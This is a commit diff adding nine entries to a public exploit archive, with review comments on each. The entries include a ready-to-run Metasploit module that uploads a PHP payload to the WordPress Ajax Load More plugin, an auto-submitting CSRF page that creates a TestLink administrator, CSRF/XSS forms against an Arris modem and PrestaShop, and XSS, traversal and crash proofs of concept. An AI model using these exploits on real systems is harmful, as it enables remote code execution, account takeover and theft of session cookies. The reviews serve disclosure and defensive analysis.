DB: 2015-11-10

9 new exploits
Offensive Security 2015-11-10 05:03:39 +00:00
parent 979bf80ebc
commit 8a3d4b8a4b
10 changed files with 492 additions and 0 deletions


@ -34921,3 +34921,12 @@ id,file,description,date,author,platform,type,port
38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0
38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0
38653,platforms/asp/webapps/38653.txt,"Corda Highwire 'Highwire.ashx' File Path Disclosure Vulnerability",2013-07-12,"Adam Willard",asp,webapps,0
38654,platforms/php/webapps/38654.txt,"OpenEMR <= 4.1 'note' Parameter HTML Injection Vulnerability",2013-07-12,"Nate Drier",php,webapps,0
38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector 'redirector.corda' Cross Site Scripting Vulnerability",2013-07-12,"Adam Willard",asp,webapps,0
38656,platforms/php/webapps/38656.html,"PrestaShop Multiple Cross Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0
38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Stored XSS Vulnerability",2015-11-09,Nu11By73,hardware,webapps,0
38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0
38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More PHP Upload Vulnerability",2015-11-09,metasploit,php,remote,0
38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - CSRF Vulnerability",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0
38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0
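Review bot: two of the new index rows disagree with the files they point at. The 38654 row says `OpenEMR <= 4.1`, while 38654.txt states "OpenEMR 4.1.1 patch-12 and prior are vulnerable"; the 38657 row titles the entry "Stored XSS" while 38657.html describes itself as "Unauth Stored CSRF/XSS" and is a cross-site form post. The index should carry the affected-version and type wording the file actually supports. Style: "Wordpress" (38660) versus "WordPress" (38643) in the same column.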


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/61152/info
Corda Highwire is prone to a path disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.
http://www.example.com/highwire.ashx?url=../../
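Review bot: the entry gives only the probe URL `highwire.ashx?url=../../` and neither the affected version nor any sample of the response, so what is disclosed (a physical path in an error page, a file listing) cannot be confirmed from this file; quote the response the traversal produces and the version tested, as the sibling 38655 entry does. For defenders the relevant controls are canonicalising the `url` parameter and rejecting `..` segments before it reaches the file system, and returning generic error pages so server paths never appear in a response.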


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/61156/info
Corda .NET Redirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Corda .NET Redirector 7.3.11.6715 is vulnerable; other versions may also be affected.
http://www.example.com/Corda/redirector.corda/? () _FILEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.example1.com></iframe>@_TEXTDESCRIPTIONEN
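Review bot: the reproduction URL on the last line is not a valid URL as written (`/? () _FILEhttp://<URL>/?<script>...`, with unencoded spaces and parentheses between `?` and `_FILE`), so it cannot be pasted and verified; spell out the parameter structure (`_FILE`, `_TEXTDESCRIPTIONEN`) in URL-encoded form. The line does make the fix clear for defenders: the redirector reflects the `_FILE` value into the page, so it needs HTML-encoding on output and the redirect target should be validated against an allowlist rather than echoed.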


@ -0,0 +1,26 @@
<!--
# Exploit Title: Unauthenticated Stored Xss
# Date: 11/6/15
# Exploit Author: Nu11By73
# Vendor Homepage: comcast.net and arrisi.com
# Version: eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT
Software Image Name:TG1682_2.0s7_PRODse
Advanced Services:TG1682G
Packet Cable:2.0
# Tested on: Default Install
-->
<html>
<p>Unauth Stored CSRF/XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<input type="hidden" name="service" value="test><script>alert(1)</script>" / >
<input type="hidden" name="protocol" value="TCP" / >
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
</html>
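Review bot: the `service` and `protocol` inputs end with `/ >` instead of `/>`, and the `<html>` has no `<body>`; browsers tolerate both, but the PoC should be well-formed. More importantly the header claims "Unauthenticated" while the page is a cross-site form post to `192.168.0.1/actionHandler/ajax_managed_services.php` fired from the victim's browser, which is the CSRF half of the chain; state whether the handler accepts the request without an admin session, since that decides whether the fix is an origin or CSRF-token check on the handler or authentication on it, in addition to encoding the `service` name before it is rendered back into the UI.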

platforms/multiple/dos/38662.txt Executable file

@ -0,0 +1,111 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=614
The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compiled with AddressSanitizer:
$ ftbench <file>
Attached are three POC files which trigger the conditions.
---
$ freetype2-demos/bin/ftbench asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b
ftbench results for font `asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b'
-------------------------------------------------------------------------------------
family: (null)
style: (null)
number of seconds for each test: 2.000000
starting glyph index: 0
face size: 10ppem
font preloading into memory: no
load flags: 0x0
render mode: 0
CFF engine set to Adobe
TrueType engine set to version 35
maximum cache size: 1024KiByte
executing tests:
Load =================================================================
==22366==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eb55 at pc 0x00000069e2fc bp 0x7fffc4670610 sp 0x7fffc4670608
READ of size 1 at 0x60200000eb55 thread T0
#0 0x69e2fb in tt_sbit_decoder_load_bit_aligned freetype2/src/sfnt/ttsbit.c:834:19
#1 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#2 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#3 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
#4 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#5 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#6 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
#7 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
#8 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
#9 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
#10 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
#11 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
#12 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
#13 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9
0x60200000eb55 is located 0 bytes to the right of 5-byte region [0x60200000eb50,0x60200000eb55)
allocated by thread T0 here:
#0 0x4bc4a8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x756740 in ft_alloc freetype2/src/base/ftsystem.c:74:12
#2 0x51b4e7 in ft_mem_qalloc freetype2/src/base/ftutil.c:76:15
#3 0x51abb1 in FT_Stream_EnterFrame freetype2/src/base/ftstream.c:269:12
#4 0x51a800 in FT_Stream_ExtractFrame freetype2/src/base/ftstream.c:200:13
#5 0x69ccab in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1036:10
#6 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#7 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
#8 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#9 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#10 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
#11 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
#12 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
#13 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
#14 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
#15 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
#16 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
#17 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9
SUMMARY: AddressSanitizer: heap-buffer-overflow freetype2/src/sfnt/ttsbit.c:834:19 in tt_sbit_decoder_load_bit_aligned
Shadow bytes around the buggy address:
0x0c047fff9d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9d60: fa fa fa fa fa fa fa fa fa fa[05]fa fa fa fd fa
0x0c047fff9d70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9d80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9d90: fa fa fd fa fa fa 04 fa fa fa 00 fa fa fa fd fa
0x0c047fff9da0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff9db0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==22366==ABORTING
---
The issue was reported in https://savannah.nongnu.org/bugs/?46379.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38662.zip
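Review bot: the two traces pin the defect well and the report should say so in one sentence: the 5-byte region is the frame extracted by `FT_Stream_ExtractFrame` from `tt_sbit_decoder_load_bitmap` (ttsbit.c:1036), and the 1-byte read at ttsbit.c:834 in `tt_sbit_decoder_load_bit_aligned` lands 0 bytes past its end, which indicates the bit-aligned decoder derives its byte count from the declared glyph dimensions rather than from the length of the bitmap data frame, so the fix is a bound on the remaining frame length before the decode loop. Missing from the report: the FreeType commit reproduced against ("current version from master" is not reproducible later) and which of the "three POC files" the shown run used beyond its hash name; the Savannah link covers fix tracking.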

platforms/php/remote/38660.rb Executable file

@ -0,0 +1,122 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Ajax Load More PHP Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary file upload in the WordPress Ajax Load More
version 2.8.1.1. It allows to upload arbitrary php files and get remote code
execution. This module has been tested successfully on WordPress Ajax Load More
2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
},
'Author' =>
[
'Unknown', # Identify yourself || send an PR here
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '8209']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Ajax Load More 2.8.1.1', {}]],
'DisclosureDate' => 'Oct 10 2015',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
], self.class
)
end
def check
check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
end
def username
datastore['WP_USERNAME']
end
def password
datastore['WP_PASSWORD']
end
def get_nonce(cookie)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),
'vars_get' => {
'page' => 'ajax-load-more-repeaters'
},
'cookie' => cookie
)
if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
return Regexp.last_match[1]
else
return nil
end
end
def exploit
vprint_status("#{peer} - Trying to login as #{username}")
cookie = wordpress_login(username, password)
fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?
vprint_status("#{peer} - Trying to get nonce")
nonce = get_nonce(cookie)
fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?
vprint_status("#{peer} - Trying to upload payload")
# This must be default.php
filename = 'default.php'
print_status("#{peer} - Uploading payload")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
'vars_post' => {
'action' => 'alm_save_repeater',
'value' => payload.encoded,
'repeater' => 'default',
'type' => 'default',
'alias' => '',
'nonce' => nonce
},
'cookie' => cookie
)
if res
if res.code == 200 && res.body.include?('Template Saved Successfully')
register_files_for_cleanup(filename)
else
fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
end
else
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end
print_status("#{peer} - Calling uploaded file")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
)
end
end
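Review bot: `register_files_for_cleanup(filename)` registers the bare name `default.php`, but the file written lives under the plugin's `core/repeater/` directory (the URI the module requests right afterwards), so cleanup looks in the wrong place, and even if it resolved, deleting it removes the plugin's own default repeater template instead of restoring it; pass the full path and document that the original template is overwritten. Versions also disagree: `check` passes `2.8.1.2` as the fixed version, the target is labelled `2.8.1.1`, and the description says tested on `2.8.0`, so state which is the last vulnerable release. The final `send_request_cgi` discards its response, so a failed trigger is still reported as success. Description grammar: "It allows to upload" should read "It allows uploading".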

platforms/php/webapps/38654.txt Executable file

@ -0,0 +1,35 @@
source: http://www.securityfocus.com/bid/61154/info
OpenEMR is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
OpenEMR 4.1.1 patch-12 and prior are vulnerable.
1. Misc > Office Notes ('note' parameter is vulnerable with a POST to
/openemr-4.1.1/interface/main/onotes/office_comments_full.php)
#Request:
POST http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
mode=new&offset=0&active=all&note=<script>alert(document.cookie)</script>
#Response:
<snip>
<tr><td><input type=hidden value='' name='act115' id='act115'><input name='box115' id='box115'
onClick='javascript:document.update_activity.act115.value=this.checked' type=checkbox checked></td><td><label
for='box115' class='bold'>Wed February 06th</label> <label for='box115' class='bold'>(test)</label></td><td><label
for='box115' class='text'><script>alert(document.cookie)</script>&nbsp;</label></td></tr>
<snip>
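Review bot: the captured request's `Content-Length: 43` does not match the body shown (`mode=new&offset=0&active=all&note=<script>alert(document.cookie)</script>` is 73 bytes raw, more once URL-encoded), and the request carries no `Cookie` header, so as pasted it will not replay; fix the length and state whether `office_comments_full.php` requires an authenticated session, since a stored injection by a logged-in user bounds the risk differently from an unauthenticated one. The response does show the root cause clearly: the `note` value is echoed verbatim inside the `<label>`, so the fix is HTML-encoding of the note field on output.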


@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/61158/info
PrestaShop is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
PrestaShop 1.5.4 is vulnerable; other versions may also be affected.
<html>
<head>
<body>
<img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</head>
</html>
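Review bot: the HTML is mis-nested: `<body>` opens inside `<head>` and `</body>` precedes `</head>`; browsers will still fetch the `<img>`, but the PoC should read `<head></head><body>...</body>`. `[Product ID]` is a placeholder the reader must fill in. For defenders the entry makes the root cause plain: a state-changing action (`cart?add=&id_product=`) is accepted over GET with no token, so the fix is to require POST plus a per-session CSRF token for cart mutations, which also removes the image-tag vector entirely.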

platforms/php/webapps/38661.txt Executable file

@ -0,0 +1,92 @@
Information
=================================
Name: CSRF Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed
Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)
CVE Reference:
=================================
Not assigned
Technical Details:
=================================
Even though the use of CSRF tokens are being implemented in the
application, they aren't properly
validated at the server side. This allows malicious requests to be
generated by the attacker and
get them processed by the server on behalf of the victim. By
exploiting the vulnerability,
the attacker will be able to create user accounts with administrator
privileges on the application.
Exploit Code
=================================
<html lang="en">
<head>
<title>CSRF Exploit to Create New Administrator Account</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_login" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="firstName" value="new_administrator_fname" />
<input type="hidden" name="lastName" value="new_administrator_lname" />
<input type="hidden" name="password" value="new_administrator_password" />
<input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
<input type="hidden" name="rights_id" value="8" />
<input type="hidden" name="locale" value="en_GB" />
<input type="hidden" name="authentication" value="" />
<input type="hidden" name="user_is_active" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="do_update" value="Save" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
Exploitation Technique:
===================================
Remote
Severity Level:
===================================
High
Advisory Timeline
===================================
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure
Solution
====================================
This vulnerability is fixed in TestLink 1.9.15 (Tauriel)
Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487
Credits & Authors
====================================
Aravind C Ajayan, Balagopal N
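Review bot: the exploit form submits `CSRFName` and `CSRFToken` as empty strings and is still processed, which narrows the root cause beyond "aren't properly validated": the server-side check passes when the token fields are empty or absent instead of failing closed, so the linked fix should be verified to reject missing tokens, not only mismatched ones. Minor: the `action` URL hardcodes `localhost/testlink_1_9_14/`, the document has no `<!DOCTYPE>`, and the Technical Details paragraph is hard-wrapped mid-sentence.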

platforms/windows/dos/38659.py Executable file

@ -0,0 +1,66 @@
'''
********************************************************************************************
# Exploit Title: POP Peeper SEH Over-write.
# Date: 9/14/2015
# Exploit Author: Un_N0n
# Software Link: http://www.esumsoft.com/download
# Version: v4.0.1
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[DUMP:]
'''
EAX 00000000
ECX 20203029
EDX 77C5660D ntdll.77C5660D
EBX 00000000
ESP 0012EC5C
EBP 0012EC7C
ESI 00000000
EDI 00000000
EIP 20203029
==============================
STACK:
0012FBF4 41414141
0012FBF8 41414141
0012FBFC 41414141
0012FC00 41414141
0012FC04 41414141
0012FC08 909020EB Pointer to next SE>
0012FC0C 20203029 SE handler
0012FC10 43434343
0012FC14 43434343
0012FC18 43434343
0012FC1C 43434343
0012FC20 43434343
0012FC24 43434343
0012FC28 43434343
===============================
'''
[Steps to Produce the Crash]:
1- Open 'POPPeeper.exe'
2- Goto Accounts->Add->CreateSingleAccount.
3- After entering the email address, the option for Account name will appear,
enter the contents of crash.txt in it->Save.
4- Then compose a new mail->In TO field and Subject field, enter the contents of crash.txt
5- Save as Draft, software will crash.
6- Open up "POPPeeper.exe" again.
7- Click on Check Mail option, Software will crash.
Everytime you click on Check mail, it will crash as it will load the saved DRAFT.
[Code to produce CRASH.txt]
'''
buffer = "A"*66666
file = "crash.txt"
f = open(file,'w')
f.write(buffer)
f.close()
'''
[Extra Info:]
Offset : 2052
**********************************************************************************************
'''
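Review bot: the file does not parse as Python: the `'''` directly after `[DUMP:]` closes the first string, leaving the register and stack dump (`EAX 00000000` onward) as bare statements, so the only runnable part (`buffer = "A"*66666` through `f.close()`) is never reached; move that `'''` to after the stack dump so the dump sits inside the comment string. The dump also does not match the generator: a buffer of 66666 `A`s would put `41414141` in the SEH record, whereas the dump shows `909020EB` as the next-SEH pointer, `20203029` as the handler and `43434343` after it, i.e. a structured buffer consistent with the stated `Offset : 2052`; say that the dump was taken with that padded test buffer rather than with crash.txt as produced by this file.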